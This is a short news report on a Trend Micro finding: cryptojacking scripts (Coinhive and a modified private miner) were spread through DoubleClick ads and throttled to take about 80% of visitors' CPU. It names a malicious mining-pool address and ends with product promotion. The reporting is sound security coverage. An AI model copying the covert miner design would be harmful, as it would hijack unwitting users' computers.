Trend Micro, a provider of security software, hardware and services, discovered a malvertising campaign on high traffic websites used by Coinhive, a JavaScript code that allows website admins to mine Monero with visitor’s CPUs.
The attackers targeted Google’s DoubleClick, which provides Internet ad serving services for distribution, Trend Micro reported on its security intelligence blog. In addition, the maladvertisements also used a separate web miner that connects to a private pool.
Trend Micro has reported its findings to Google about the campaign, which affected Japan, France, Taiwan, Italy and Spain.
Trend Micro noticed a rise in traffic to five malicious domains on Jan 18, and on Jan. 24 it found a near 285% jump in the number of Coinhive miners. The traffic came from DoubleClick advertisements.
Web Miner Scripts Embedded
Two different web miner scripts were embedded, along with a script displaying the advertisements from DoubleClick. The attacked web page displayed the legitimate advertisement while the two web miners conducted their covert tasks.
The use of the advertisements on legitimate websites is believed to be a ploy to attack a greater number of users.
The traffic connected to these miners declined after Jan 24.
The advertisement contains a JavaScript code that creates a random number between one and 100 variables. When it creates a variable above 10, it alerts coinhive.min to mine 80% of the CPU power. This occurs 90% of the time. For the other 10%, a private web miner launches. The two miners were configured with throttle 0.2, indicating they use 80% of the CPU resources to mine.
After de-obfuscating a private web miner known as mqoj_1, a JavaScript code based on Coinhive can still be identified. The modified miner then uses a different mining pool, wss://ws.l33tsite.info:8443, which is used to avoid the Coinhive 30% commission fee.
Also read: Starbucks’ Wi-Fi found using people’s laptops to mine Monero
Attacks Can Be Prevented
Coinhive miners can be prevented from using CPU resources by blocking JavaScript based applications from running on browsers, the blog noted. The impact of cryptocurrency malware and other threats exploiting system vulnerabilities can be mitigated by regularly updating and patching the software.
Trend Micro Smart Protection Suites and Worry-Free Business Security protect businesses and users from threats by blocking malicious files and related URLs.
Trend Micro Protection Suites provide capabilities such as behavior monitoring, web reputation services, high fidelity machine learning and application control to reduce the impact of such cryptocurrency miners and other threats.
